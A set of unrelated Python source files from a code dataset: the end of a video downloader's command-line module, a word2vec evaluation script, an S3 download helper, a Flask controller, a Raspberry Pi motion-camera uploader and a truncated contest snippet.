if params.get('-y', False): # None or unset -> False\n print('Real Playpath:\\n%s\\n' % [params.get('-y')])\n return\n\n if player:\n from .processor.rtmpdump import play_rtmpdump_stream\n play_rtmpdump_stream(player, url, params)\n return\n\n from .processor.rtmpdump import (\n has_rtmpdump_installed, download_rtmpdump_stream\n )\n assert has_rtmpdump_installed(), 'RTMPDump not installed.'\n download_rtmpdump_stream(url, title, ext, params, output_dir)\n\n\ndef download_url_ffmpeg(\n url, title, ext, params={}, total_size=0, output_dir='.', refer=None,\n merge=True, stream=True, **kwargs\n):\n assert url\n if dry_run:\n print('Real URL:\\n%s\\n' % [url])\n if params.get('-y', False): # None or unset ->False\n print('Real Playpath:\\n%s\\n' % [params.get('-y')])\n return\n\n if player:\n launch_player(player, [url], refer=refer)\n return\n\n from .processor.ffmpeg import has_ffmpeg_installed, ffmpeg_download_stream\n assert has_ffmpeg_installed(), 'FFmpeg not installed.'\n\n global output_filename\n if output_filename:\n dotPos = output_filename.rfind('.')\n if dotPos > 0:\n title = output_filename[:dotPos]\n ext = output_filename[dotPos+1:]\n else:\n title = output_filename\n\n title = tr(get_filename(title))\n\n ffmpeg_download_stream(\n url, title, ext, params, output_dir, stream=stream, **kwargs\n )\n\n\ndef playlist_not_supported(name):\n def f(*args, **kwargs):\n raise NotImplementedError('Playlist is not supported for ' + name)\n return f\n\n\ndef print_info(site_info, title, type, size, **kwargs):\n if json_output:\n json_output_.print_info(\n site_info=site_info, title=title, type=type, size=size\n )\n return\n if type:\n type = type.lower()\n if type in ['3gp']:\n type = 'video/3gpp'\n elif type in ['asf', 'wmv']:\n type = 'video/x-ms-asf'\n elif type in ['flv', 'f4v']:\n type = 'video/x-flv'\n elif type in ['mkv']:\n type = 'video/x-matroska'\n elif type in ['mp3']:\n type = 'audio/mpeg'\n elif type in ['mp4']:\n type = 'video/mp4'\n elif type in ['mov']:\n type = 'video/quicktime'\n elif type in ['ts']:\n type = 'video/MP2T'\n elif type in ['webm']:\n type = 'video/webm'\n\n elif type in ['jpg']:\n type = 'image/jpeg'\n elif type in ['png']:\n type = 'image/png'\n elif type in ['gif']:\n type = 'image/gif'\n\n if type in ['video/3gpp']:\n type_info = '3GPP multimedia file (%s)' % type\n elif type in ['video/x-flv', 'video/f4v']:\n type_info = 'Flash video (%s)' % type\n elif type in ['video/mp4', 'video/x-m4v']:\n type_info = 'MPEG-4 video (%s)' % type\n elif type in ['video/MP2T']:\n type_info = 'MPEG-2 transport stream (%s)' % type\n elif type in ['video/webm']:\n type_info = 'WebM video (%s)' % type\n # elif type in ['video/ogg']:\n # type_info = 'Ogg video (%s)' % type\n elif type in ['video/quicktime']:\n type_info = 'QuickTime video (%s)' % type\n elif type in ['video/x-matroska']:\n type_info = 'Matroska video (%s)' % type\n # elif type in ['video/x-ms-wmv']:\n # type_info = 'Windows Media video (%s)' % type\n elif type in ['video/x-ms-asf']:\n type_info = 'Advanced Systems Format (%s)' % type\n # elif type in ['video/mpeg']:\n # type_info = 'MPEG video (%s)' % type\n elif type in ['audio/mp4', 'audio/m4a']:\n type_info = 'MPEG-4 audio (%s)' % type\n elif type in ['audio/mpeg']:\n type_info = 'MP3 (%s)' % type\n elif type in ['audio/wav', 'audio/wave', 'audio/x-wav']:\n type_info = 'Waveform Audio File Format ({})'.format(type)\n\n elif type in ['image/jpeg']:\n type_info = 'JPEG Image (%s)' % type\n elif type in ['image/png']:\n type_info = 'Portable Network Graphics (%s)' % type\n elif type in ['image/gif']:\n type_info = 'Graphics Interchange Format (%s)' % type\n elif type in ['m3u8']:\n if 'm3u8_type' in kwargs:\n if kwargs['m3u8_type'] == 'master':\n type_info = 'M3U8 Master {}'.format(type)\n else:\n type_info = 'M3U8 Playlist {}'.format(type)\n else:\n type_info = 'Unknown type (%s)' % type\n\n maybe_print('Site: ', site_info)\n maybe_print('Title: ', unescape(tr(title)))\n print('Type: ', type_info)\n if type != 'm3u8':\n print(\n 'Size: ', round(size / 1048576, 2),\n 'MiB (' + str(size) + ' Bytes)'\n )\n if type == 'm3u8' and 'm3u8_url' in kwargs:\n print('M3U8 Url: {}'.format(kwargs['m3u8_url']))\n print()\n\n\ndef mime_to_container(mime):\n mapping = {\n 'video/3gpp': '3gp',\n 'video/mp4': 'mp4',\n 'video/webm': 'webm',\n 'video/x-flv': 'flv',\n }\n if mime in mapping:\n return mapping[mime]\n else:\n return mime.split('/')[1]\n\n\ndef parse_host(host):\n \"\"\"Parses host name and port number from a string.\n \"\"\"\n if re.match(r'^(\\d+)$', host) is not None:\n return ('0.0.0.0', int(host))\n if re.match(r'^(\\w+)://', host) is None:\n host = '//' + host\n o = parse.urlparse(host)\n hostname = o.hostname or '0.0.0.0'\n port = o.port or 0\n return (hostname, port)\n\n\ndef set_proxy(proxy):\n session.proxies.update({\n 'http': '%s:%s' % proxy,\n 'https': '%s:%s' % proxy,\n })\n\n\ndef unset_proxy():\n session.proxies = {}\n\n\ndef download_main(download, download_playlist, urls, playlist, **kwargs):\n for url in urls:\n if re.match(r'https?://', url) is None:\n url = 'http://' + url\n\n if playlist:\n download_playlist(url, **kwargs)\n else:\n download(url, **kwargs)\n\n\ndef load_cookies(cookiefile):\n global cookies\n try:\n cookies = cookiejar.MozillaCookieJar(cookiefile)\n cookies.load()\n except Exception:\n import sqlite3\n cookies = cookiejar.MozillaCookieJar()\n con = sqlite3.connect(cookiefile)\n cur = con.cursor()\n try:\n cur.execute(\"\"\"SELECT host, path, isSecure, expiry, name, value\n FROM moz_cookies\"\"\")\n for item in cur.fetchall():\n c = cookiejar.Cookie(\n 0, item[4], item[5], None, False, item[0],\n item[0].startswith('.'), item[0].startswith('.'),\n item[1], False, item[2], item[3], item[3] == '', None,\n None, {},\n )\n cookies.set_cookie(c)\n except Exception:\n pass\n # TODO: Chromium Cookies\n # SELECT host_key, path, secure, expires_utc, name, encrypted_value\n # FROM cookies\n # http://n8henrie.com/2013/11/use-chromes-cookies-for-easier-downloading-with-python-requests/\n\n\ndef set_socks_proxy(proxy):\n try:\n import socks\n socks_proxy_addrs = proxy.split(':')\n socks.set_default_proxy(\n socks.SOCKS5,\n socks_proxy_addrs[0],\n int(socks_proxy_addrs[1])\n )\n socket.socket = socks.socksocket\n\n def getaddrinfo(*args):\n return [\n (socket.AF_INET, socket.SOCK_STREAM, 6, '', (args[0], args[1]))\n ]\n socket.getaddrinfo = getaddrinfo\n except ImportError:\n log.w(\n 'Error importing PySocks library, socks proxy ignored.'\n 'In order to use use socks proxy, please install PySocks.'\n )\n\n\ndef script_main(download, download_playlist, **kwargs):\n logging.basicConfig(format='[%(levelname)s] %(message)s')\n\n def print_version():\n version = __version__\n log.i(\n 'version {}, a tiny downloader that scrapes the web.'.format(\n version\n )\n )\n\n parser = argparse.ArgumentParser(\n prog='lulu',\n usage='lulu [OPTION]... URL...',\n description='A tiny downloader that scrapes the web',\n add_help=False,\n )\n parser.add_argument(\n '-V', '--version', action='store_true',\n help='Print version and exit'\n )\n parser.add_argument(\n '-h', '--help', action='store_true',\n help='Print this help message and exit'\n )\n\n dry_run_grp = parser.add_argument_group(\n 'Dry-run options', '(no actual downloading)'\n )\n dry_run_grp = dry_run_grp.add_mutually_exclusive_group()\n dry_run_grp.add_argument(\n '-i', '--info', action='store_true', help='Print extracted information'\n )\n dry_run_grp.add_argument(\n '-u', '--url', action='store_true',\n help='Print extracted information with URLs'\n )\n dry_run_grp.add_argument(\n '--json', action='store_true',\n help='Print extracted URLs in JSON format'\n )\n\n download_grp = parser.add_argument_group('Download options')\n download_grp.add_argument(\n '-n', '--no-merge', action='store_true', default=False,\n help='Do not merge video parts'\n )\n download_grp.add_argument(\n '--no-caption', action='store_true',\n help='Do not download captions (subtitles, lyrics, danmaku, ...)'\n )\n download_grp.add_argument(\n '-f', '--force', action='store_true', default=False,\n help='Force overwriting existing files'\n )\n download_grp.add_argument(\n '-F', '--format', metavar='STREAM_ID',\n help='Set video format to STREAM_ID'\n )\n download_grp.add_argument(\n '-O', '--output-filename', metavar='FILE', help='Set output filename'\n )\n download_grp.add_argument(\n '-o', '--output-dir', metavar='DIR', default='.',\n help='Set output directory'\n )\n download_grp.add_argument(\n '-p', '--player', metavar='PLAYER',\n help='Stream extracted URL to a PLAYER'\n )\n download_grp.add_argument(\n '-c', '--cookies', metavar='COOKIES_FILE',\n help='Load cookies.txt or cookies.sqlite'\n )\n download_grp.add_argument(\n '-t', '--timeout', metavar='SECONDS', type=int, default=600,\n help='Set socket timeout'\n )\n download_grp.add_argument(\n '-d', '--debug', action='store_true',\n help='Show traceback and other debug info'\n )\n download_grp.add_argument(\n '-I', '--input-file', metavar='FILE', type=argparse.FileType('r'),\n help='Read non-playlist URLs from FILE'\n )\n download_grp.add_argument(\n '-P', '--password', help='Set video visit password to PASSWORD'\n )\n download_grp.add_argument(\n '-l', '--playlist', action='store_true',\n help='Prefer to download a playlist'\n )\n download_grp.add_argument(\n '-T', '--thread', type=int, default=0,\n help=(\n 'Use multithreading to download (only works for multiple-parts '\n 'video)'\n )\n )\n\n proxy_grp = parser.add_argument_group('Proxy options')\n proxy_grp = proxy_grp.add_mutually_exclusive_group()\n proxy_grp.add_argument(\n '-x', '--http-proxy', metavar='HOST:PORT',\n help='Use an HTTP proxy for downloading'\n )\n proxy_grp.add_argument(\n '-y', '--extractor-proxy', metavar='HOST:PORT',\n help='Use an HTTP proxy for extracting only'\n )\n proxy_grp.add_argument(\n '--no-proxy', action='store_true', help='Never use a proxy'\n )\n proxy_grp.add_argument(\n '-s', '--socks-proxy', metavar='HOST:PORT',\n help='Use an SOCKS5 proxy for downloading'\n )\n\n download_grp.add_argument('--stream', help=argparse.SUPPRESS)\n download_grp.add_argument('--itag', help=argparse.SUPPRESS)\n\n parser.add_argument('URL', nargs='*', help=argparse.SUPPRESS)\n\n args = parser.parse_args()\n\n if args.help:\n print_version()\n parser.print_help()\n sys.exit()\n if args.version:\n print_version()\n sys.exit()\n\n if args.debug:\n # Set level of root logger to DEBUG\n logging.getLogger().setLevel(logging.DEBUG)\n\n global force\n global dry_run\n global json_output\n global player\n global extractor_proxy\n global output_filename\n\n output_filename = args.output_filename\n extractor_proxy = args.extractor_proxy\n\n info_only = args.info\n if args.url:\n dry_run = True\n if args.json:\n json_output = True\n # to fix extractors not use VideoExtractor\n dry_run = True\n info_only = False\n\n if args.cookies:\n load_cookies(args.cookies)\n\n caption = True\n stream_id = args.format or args.stream or args.itag\n if args.no_caption:\n caption = False\n if args.player:\n player = args.player\n caption = False\n\n if args.no_proxy:\n unset_proxy()\n else:\n if args.http_proxy:\n set_proxy(parse_host(args.http_proxy))\n if args.socks_proxy:\n set_socks_proxy(args.socks_proxy)\n\n URLs = []\n if args.input_file:\n logging.debug('you are trying to load urls from %s', args.input_file)\n if args.playlist:\n log.e(\n \"reading playlist from a file is unsupported \"\n \"and won't make your life easier\"\n )\n sys.exit(2)\n URLs.extend(args.input_file.read().splitlines())\n args.input_file.close()\n URLs.extend(args.URL)\n\n if not URLs:\n parser.print_help()\n sys.exit()\n\n socket.setdefaulttimeout(args.timeout)\n\n try:\n extra = {}\n if extractor_proxy:\n extra['extractor_proxy'] = extractor_proxy\n if stream_id:\n extra['stream_id'] = stream_id\n download_main(\n download, download_playlist,\n URLs, args.playlist,\n output_dir=args.output_dir, merge=not args.no_merge,\n info_only=info_only, json_output=json_output, caption=caption,\n password=args.password, thread=args.thread,\n **extra\n )\n except KeyboardInterrupt:\n if args.debug:\n raise\n else:\n sys.exit(1)\n except UnicodeEncodeError:\n if args.debug:\n raise\n log.e(\n '[error] oops, the current environment does not seem to support '\n 'Unicode.'\n )\n log.e('please set it to a UTF-8-aware locale first,')\n log.e(\n 'so as to save the video (with some Unicode characters) correctly.'\n )\n log.e('you can do it like this:')\n log.e(' (Windows) % chcp 65001 ')\n log.e(' (Linux) $ LC_CTYPE=en_US.UTF-8')\n sys.exit(1)\n except Exception:\n if not args.debug:\n log.e('[error] oops, something went wrong.')\n log.e(\n 'don\\'t panic, c\\'est la vie. please try the following steps:'\n )\n log.e(' (1) Rule out any network problem.')\n log.e(' (2) Make sure lulu is up-to-date.')\n log.e(' (3) Check if the issue is already known, on')\n log.e(' https://github.com/iawia002/Lulu/issues')\n log.e(' (4) Run the command with \\'--debug\\' option,')\n log.e(' and report this issue with the full output.')\n else:\n print_version()\n log.i(args)\n raise\n sys.exit(1)\n\n\ndef google_search(url):\n keywords = match1(url, r'https?://(.*)')\n url = 'https://www.google.com/search?tbm=vid&q=%s' % parse.quote(keywords)\n page = get_content(url)\n videos = re.findall(\n r'([^<]+)<', page\n )\n vdurs = re.findall(r'([^<]+)<', page)\n durs = [match1(unescape(dur), r'(\\d+:\\d+)') for dur in vdurs]\n print('Google Videos search:')\n for v in zip(videos, durs):\n print('- video: {} [{}]'.format(\n unescape(v[0][1]),\n v[1] if v[1] else '?'\n ))\n print('# lulu %s' % log.sprint(v[0][0], log.UNDERLINE))\n print()\n print('Best matched result:')\n return(videos[0][0])\n\n\ndef url_to_module(url):\n try:\n video_host = match1(url, r'https?://([^/]+)/')\n video_url = match1(url, r'https?://[^/]+(.*)')\n assert video_host and video_url\n except AssertionError:\n url = google_search(url)\n video_host = match1(url, r'https?://([^/]+)/')\n video_url = match1(url, r'https?://[^/]+(.*)')\n\n if video_host.endswith('.com.cn') or video_host.endswith('.ac.cn'):\n video_host = video_host[:-3]\n domain = match1(video_host, r'(\\.[^.]+\\.[^.]+)$') or video_host\n assert domain, 'unsupported url: ' + url\n\n k = match1(domain, r'([^.]+)')\n if k in SITES:\n return (\n import_module('.'.join(['lulu', 'extractors', SITES[k]])),\n url\n )\n else:\n import http.client\n video_host = match1(url, r'https?://([^/]+)/') # .cn could be removed\n if url.startswith('https://'):\n conn = http.client.HTTPSConnection(video_host)\n else:\n conn = http.client.HTTPConnection(video_host)\n conn.request('HEAD', video_url, headers=FAKE_HEADERS)\n res = conn.getresponse()\n location = res.getheader('location')\n if location and location != url and not location.startswith('/'):\n return url_to_module(location)\n else:\n return import_module('lulu.extractors.universal'), url\n\n\ndef any_download(url, **kwargs):\n m, url = url_to_module(url)\n m.download(url, **kwargs)\n\n\ndef any_download_playlist(url, **kwargs):\n m, url = url_to_module(url)\n m.download_playlist(url, **kwargs)\n\n\ndef main(**kwargs):\n script_main(any_download, any_download_playlist, **kwargs)\n","repo_name":"iawia002/Lulu","sub_path":"lulu/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":39687,"program_lang":"python","lang":"en","doc_type":"code","stars":812,"dataset":"github-code","pt":"35"} +{"seq_id":"19002903204","text":"import gensim\nimport random\nimport logging\n\n# configuration\ntrains = \"../../temp_results/word2vec_hindi.txt\"\ncreate = 1\ntopn = 10\n\ndata_folder = '../data/word2vec_evaluation/'\nTARGET_SYN = data_folder+'syntactic.questions.txt'\nTARGET_SEM_OP = data_folder+'semantic_op.questions.txt'\nTARGET_SEM_BM = data_folder+'semantic_bm.questions.txt'\nTARGET_SEM_DF = data_folder+'semantic_df.questions.txt'\nSRC_NOUNS = data_folder+'nouns.txt'\nSRC_BESTMATCH = data_folder+'bestmatch.txt'\nSRC_DOESNTFIT = data_folder+'doesntfit.txt'\nSRC_OPPOSITE = data_folder+'opposite.txt'\nPATTERN_SYN = [('nouns', 'SI/PL', SRC_NOUNS, 0, 1)]\n#logger.write(filename=train.strip() + '.result', format='%(asctime)s : %(message)s', level=logging.INFO)\nprint (\"TEST\")\n# function create_syntactic_testset\n# ... creates syntactic test set and writes it into a file\n# @return void\ndef create_syntactic_testset():\n print (\"TEST\")\n with open(TARGET_SYN, 'w') as t:\n for label, short, src, index1, index2 in PATTERN_SYN:\n t.write(': ' + label + ': ' + short + '\\n')\n for q in create_questions(src, index1, index2):\n t.write(q + '\\n')\n\n\n# function create_semantic_testset\n# ... creates semantic test set and writes it into a file\n# @return void\ndef create_semantic_testset():\n # opposite\n print (\"TEST\")\n with open(TARGET_SEM_OP, 'w') as t:\n for q in create_questions(SRC_OPPOSITE):\n t.write(q + '\\n')\n logging.info('created opposite questions')\n # best match\n with open(TARGET_SEM_BM, 'w') as t:\n groups = open(SRC_BESTMATCH).read().split(':')\n groups.pop(0) # remove first empty group\n for group in groups:\n questions = group.splitlines()\n questions.pop(0)\n while questions:\n for i in range(1,len(questions)):\n question = questions[0].split('-') + questions[i].split('-')\n t.write(' '.join(question) + '\\n')\n questions.pop(0)\n # doesn't fit\n with open(TARGET_SEM_DF, 'w') as t:\n for line in open(SRC_DOESNTFIT):\n words = line.split()\n for wrongword in words[-1].split('-'):\n question = ' '.join(words[:3] + [wrongword])\n t.write(question + '\\n')\n\n\n# function create_questions\n# ... creates single questions from given source\n# @param string src source file to load words from\n# @param integer index2 index of first word in a line to focus on\n# @param integer index2 index of second word in a line to focus on\n# @param integer combinate number of combinations with random other lines\n# @return list of question words\ndef create_questions(src, index1=0, index2=1):\n # get source content\n \n with open(src) as f:\n content = f.readlines()\n content = [x.strip() for x in content]\n \n questions = []\n\n for line in content:\n for i in range(0, 10):\n # get current word pair\n question = list(line.split('-'))\n # get random word pair that is not the current\n random_line = random.choice(list(set(content) - {line}))\n random_word = list(random_line.split('-'))\n # merge both word pairs to one question\n question.extend(random_word)\n questions.append(' '.join(question))\n print (len(questions))\n return questions\n\n\n# function test_mostsimilar\n# ... tests given model to most similar word\n# @param word2vec model to test\n# @param string src source file to load words from\n# @param string label to print current test case\n# @param integer topn number of top matches\ndef test_mostsimilar(model, src, label='most similar', topn=5):\n \n num_lines = sum(1 for line in open(src))\n num_questions = 0\n num_right = 0\n num_topn = 0\n # get questions\n import codecs\n with codecs.open(src,encoding='utf-8') as f:\n questions = f.readlines()\n questions = [x.strip() for x in questions]\n \n # test each question\n for question in questions:\n words = question.split()\n # check if all words exist in vocabulary\n if all(x in model.index2word for x in words):\n num_questions += 1\n bestmatches = model.most_similar(positive=[words[1], words[2]], negative=[words[0]], topn=topn)\n # best match\n if words[3] in bestmatches[0]:\n num_right += 1\n # topn match\n for topmatches in bestmatches[:topn]:\n if words[3] in topmatches:\n num_topn += 1\n break\n # calculate result\n correct_matches = round(num_right/float(num_questions)*100, 1) if num_questions>0 else 0.0\n topn_matches = round(num_topn/float(num_questions)*100, 1) if num_questions>0 else 0.0\n coverage = round(num_questions/float(num_lines)*100, 1) if num_lines>0 else 0.0\n # log result\n print (correct_matches)\n print (topn_matches)\n print (coverage)\n\n# function test_mostsimilar\n# ... tests given model to most similar word\n# @param word2vec model to test\n# @param string src source file to load words from\n# @param integer topn number of top matches\ndef test_mostsimilar_groups(model, src, topn=10):\n num_lines = 0\n num_questions = 0\n num_right = 0\n num_topn = 0\n # test each group\n groups = open(src).read().split('\\n: ')\n for group in groups:\n questions = group.splitlines()\n label = questions.pop(0)\n label = label[2:] if label.startswith(': ') else label # handle first group\n num_group_lines = len(questions)\n num_group_questions = 0\n num_group_right = 0\n num_group_topn = 0\n # test each question of current group\n for question in questions:\n words = question.decode('utf-8').split()\n # check if all words exist in vocabulary\n if all(x in model.index2word for x in words):\n num_group_questions += 1\n bestmatches = model.most_similar(positive=[words[1], words[2]], negative=[words[0]], topn=topn)\n # best match\n if words[3] in bestmatches[0]:\n num_group_right += 1\n # topn match\n for topmatches in bestmatches[:topn]:\n if words[3] in topmatches:\n num_group_topn += 1\n break\n # calculate result\n correct_group_matches = round(num_group_right/float(num_group_questions)*100, 1) if num_group_questions>0 else 0.0\n topn_group_matches = round(num_group_topn/float(num_group_questions)*100, 1) if num_group_questions>0 else 0.0\n group_coverage = round(num_group_questions/float(num_group_lines)*100, 1) if num_group_lines>0 else 0.0\n # log result\n # total numbers\n num_lines += num_group_lines\n num_questions += num_group_questions\n num_right += num_group_right\n num_topn += num_group_topn\n # calculate result\n correct_matches = round(num_right/float(num_questions)*100, 1) if num_questions>0 else 0.0\n topn_matches = round(num_topn/float(num_questions)*100, 1) if num_questions>0 else 0.0\n coverage = round(num_questions/float(num_lines)*100, 1) if num_lines>0 else 0.0\n\n# function test_doesntfit\n# ... tests given model to most not fitting word\n# @param word2vec model to test\n# @param string src source file to load words from\ndef test_doesntfit(model, src):\n num_lines = sum(1 for line in open(src))\n num_questions = 0\n num_right = 0\n # get questions\n with open(src) as f:\n questions = f.readlines()\n questions = [x.strip() for x in questions]\n # test each question\n for question in questions:\n words = question.decode('utf-8').split()\n # check if all words exist in vocabulary\n if all(x in model.index2word for x in words):\n num_questions += 1\n if model.doesnt_match(words) == words[3]:\n num_right += 1\n # calculate result\n correct_matches = round(num_right/float(num_questions)*100, 1) if num_questions>0 else 0.0\n coverage = round(num_questions/float(num_lines)*100, 1) if num_lines>0 else 0.0\n \nif create == 1:\n create_syntactic_testset()\n create_semantic_testset()\n\n# get trained model\nmodel = gensim.models.KeyedVectors.load_word2vec_format(trains.strip())\nprint (\"word 2 vec read successfully.\")\n# execute evaluation\n\ntest_mostsimilar_groups(model, TARGET_SYN, topn)\ntest_mostsimilar(model, TARGET_SEM_OP, 'opposite', topn)\ntest_mostsimilar(model, TARGET_SEM_BM, 'best match', topn)\ntest_doesntfit(model, TARGET_SEM_DF)","repo_name":"kabrapratik28/DeepNews","sub_path":"word2vec/eval_word2vec.py","file_name":"eval_word2vec.py","file_ext":"py","file_size_in_byte":8683,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"35"} +{"seq_id":"7785546714","text":"import os\nimport io\nfrom boto3.session import Session\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\n\ndef download_from_aws_s3(filename):\n\n file_stream = io.BytesIO()\n session = Session(aws_access_key_id=os.getenv(\n 'AWS_ACCESS_KEY'), aws_secret_access_key=os.getenv('AWS_SECRET_KEY'))\n\n s3 = session.resource('s3')\n bucket = os.getenv('AWS_BUCKET_NAME')\n\n my_bucket = s3.Bucket(bucket)\n my_bucket.download_fileobj(filename, file_stream)\n file_stream.seek(0)\n\n # print(file_stream)\n\n return {\"file_stream\": file_stream, \"filename\": filename}\n","repo_name":"Jurajzovinec/drawing-slicer","sub_path":"python_services/aws_s3_services/aws_s3_download_file.py","file_name":"aws_s3_download_file.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36183954723","text":"import datetime\r\nimport json\r\nfrom utils.jwt import Jwt\r\nfrom models.activity import Activity\r\nfrom utils.dumps import response\r\nclass Controller:\r\n def __init__(self):\r\n self.activity = Activity()\r\n def create(self, request):\r\n p = Jwt.authHeader(request)\r\n res = json.loads(p)\r\n if res['code'] == 20000:\r\n data = json.loads(request.get_data())\r\n data['creator'] = res['data']['username']\r\n result = self.activity.save(data)\r\n if result == None:\r\n return response({}, code=50000, message='该广告已存在!')\r\n return response({}, code=20000, message='创建成功!')\r\n else:\r\n return p\r\n def getList(self, request):\r\n p = Jwt.authHeader(request)\r\n res = json.loads(p)\r\n if res['code'] == 20000:\r\n result = self.activity.findAll()\r\n return response(result, code=20000, message='获取成功!')\r\n else:\r\n return p\r\n return p\r\n\r\n def edit(self, request):\r\n p = Jwt.authHeader(request)\r\n res = json.loads(p)\r\n if res['code'] == 20000:\r\n data = json.loads(request.get_data())\r\n result = self.activity.update_one(data['id'], data)\r\n if result == None:\r\n return response({}, code=50000, message='该广告已存在!')\r\n return response({}, code=20000, message='修改成功!')\r\n else:\r\n return p\r\n def delete(self,request):\r\n p = Jwt.authHeader(request)\r\n res = json.loads(p)\r\n if res['code'] == 20000:\r\n data = json.loads(request.get_data())\r\n result = self.activity.delete(data)\r\n print(type(result))\r\n return response({}, code=20000, message='删除成功!')\r\n else:\r\n return p\r\n\r\n","repo_name":"hfyy456/flask-admin-service","sub_path":"controller/activityController.py","file_name":"activityController.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"35"} +{"seq_id":"806831300","text":"from sensor_implementation.video_sensor import VideoSensor\nimport numpy as np\nimport time\nimport os\nfrom subprocess import call\nfrom picamera import PiCameraCircularIO\nfrom sensehub_client.client import Client\nfrom sensehub_client.value import Value\nfrom multiprocessing import Process, Queue\nimport base64\nimport configparser\n\n\nclass PrintListener():\n\n # circular buffer time\n _CIRCULAR_BUFFER_TIME_S = 5\n # recording time after no motion is detected\n _RECORDING_TIME_S = 5\n\n # output format\n _FORMAT = \"h264\"\n # file extension for video saving\n _FILE_EXTENSION = \"h264\"\n\n _MOTION_COUNTER_THRESHOLD = 3\n\n # time before the motion sensing is activated, allows the camera to have a\n # \"stable\" motion matrix\n _STABILIZATION_TIME_S = 2\n\n # time between each upload\n _UPLOAD_TIME_S = 3\n\n def __init__(self):\n self._folderPath = './generated'\n self._is_camera_recording = False\n self._last_time_motion = 0\n self._stream = None\n self._file = None\n self._nbImages = 0\n self._motion_counter = 0\n client_video, client_image = create_clients('./config.ini')\n clients = {'image': client_image, 'video': client_video}\n self._upload_processes, self._message_queues = self._create_processes(\n clients)\n\n self._filename_video = ''\n\n self._last_uploaded = 0\n\n for process in self._upload_processes.values():\n print(\"starting process\" + str(process))\n process.start()\n\n if not os.path.isdir(self._folderPath):\n os.mkdir(self._folderPath)\n\n def new_image(self, a, camera):\n if self._stream is None:\n self._stream = PiCameraCircularIO(\n camera, seconds=PrintListener._CIRCULAR_BUFFER_TIME_S, splitter_port=3)\n camera.start_recording(\n self._stream, splitter_port=3, format=PrintListener._FORMAT, sei=True, sps_timing=True)\n\n # waiting 2 seconds before trying to find motion so the camera has a\n # stable motion state\n if self._nbImages < PrintListener._STABILIZATION_TIME_S * camera.framerate:\n self._nbImages += 1\n return\n\n now = time.time()\n\n a = np.sqrt(\n np.square(a['x'].astype(np.float)) +\n np.square(a['y'].astype(np.float))\n ).clip(0, 255).astype(np.uint8)\n\n is_persistent = False\n\n # If there're more than 10 vectors with a magnitude greater\n # than 60, then say we've detected motion\n if (a > 60).sum() > 10:\n print('Motion detected!')\n self._last_time_motion = now\n self._motion_counter += 1\n elif now - self._last_time_motion > PrintListener._RECORDING_TIME_S:\n self._motion_counter = 0\n\n # Get image every _UPLOAD_TIME_S and convert to base 64\n if now - self._last_uploaded >= PrintListener._UPLOAD_TIME_S:\n filename_picture = self._folderPath +'/temp_image_' + str(now)\n camera.capture(filename_picture, 'jpeg',\n use_video_port=True, quality=80)\n self._message_queues['image'].put(\n (filename_picture, is_persistent, 'image'))\n self._last_uploaded = now\n\n if now - self._last_time_motion <= PrintListener._RECORDING_TIME_S and self._motion_counter >= PrintListener._MOTION_COUNTER_THRESHOLD:\n if not self._is_camera_recording:\n self._filename_video = self._folderPath + \\\n '/frame%03d.%s' % (now, PrintListener._FILE_EXTENSION)\n self._file = open(self._filename_video, 'wb')\n\n self._stream.copy_to(self._file)\n self._stream.clear()\n\n self._is_camera_recording = True\n camera.start_recording(\n self._file, splitter_port=2, format=PrintListener._FORMAT, sei=True, sps_timing=True)\n\n print('Writing %s' % self._filename_video)\n\n elif self._is_camera_recording:\n camera.stop_recording(splitter_port=2)\n self._file.close()\n self._is_camera_recording = False\n print('Recording stopped!')\n self._message_queues['video'].put(\n (self._filename_video, None, 'video'))\n\n def _create_processes(self, clients):\n processes = {}\n queues = {}\n for data_type, client in clients.items():\n queues[data_type] = Queue()\n processes[data_type] = Process(\n target=self._upload_method, args=(queues[data_type], client))\n return processes, queues\n\n def _convert_mp4(self, filename):\n filename_mp4 = filename +\"_converted.mp4\"\n command = \"MP4Box -add %s %s\" %(filename, filename_mp4)\n returncode = call(command.split(\" \"))\n if returncode != 0:\n return filename\n else:\n os.remove(filename)\n return filename_mp4\n\n def _upload_method(self, queue, client):\n while True:\n filename, is_persistent, data_type = queue.get()\n\n try:\n if data_type == 'video':\n filename = self._convert_mp4(filename)\n\n value = Value(value=self._toBase64(filename),\n type=data_type,\n meta={'persist': is_persistent})\n status, message = client.new_value(value)\n if status:\n print('Successfully uploaded : ' + data_type)\n os.remove(filename)\n else:\n print(\"Could not connect to server\")\n finally:\n pass\n\n def _toBase64(self, filename):\n '''\n Convert image to base64\n :param filename: filename\n :return:\n '''\n with open(filename, 'rb') as img:\n return base64.b64encode(img.read()).decode('utf-8')\n\n\ndef create_clients(filename):\n '''\n i.e : create_client('./config.ini')\n '''\n\n try:\n config = configparser.ConfigParser()\n config.read(filename)\n\n server_ip = config.get(\"server\", 'ip')\n server_port = config.get(\"server\", 'port')\n\n sensor_id_video = config.get(\"sensor_video\", 'sensor_id')\n key_video = config.get(\"sensor_video\", 'key')\n\n sensor_id_image = config.get(\"sensor_picture\", 'sensor_id')\n key_image = config.get(\"sensor_picture\", 'key')\n\n return Client(server_ip, server_port, sensor_id_video, key_video), Client(server_ip, server_port, sensor_id_image, key_image)\n\n except FileExistsError:\n print(\"Error with file\")\n except FileNotFoundError:\n print(\"File does not exist\")\n except configparser.NoOptionError:\n print(\"Option does not exist\")\n\n\ndef main():\n sensor = VideoSensor('videoTest')\n sensor.add(PrintListener())\n input(\"ENTER TO QUIT\\n\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MichaelCaraccio/pi-eye","sub_path":"use/main_camera_sensor.py","file_name":"main_camera_sensor.py","file_ext":"py","file_size_in_byte":6960,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"6566947039","text":"import copy\nfrom math import sqrt\nimport sys\nfrom collections import defaultdict, deque\nfrom itertools import permutations, combinations\nimport heapq\nimport bisect\n\ndr, dc = [-1, 1, 0, 0], [0, 0, -1, 1]\n\ninput = sys.stdin.readline\nINF = sys.maxsize\n\n# ===========================================================\n\nn = int(input())\n\nword = [input().rstrip() for _ in range(n)]\n\ndict = {}\n\nfor i in range(n):\n for j in range(len(word[i])):\n if word[i][j] in 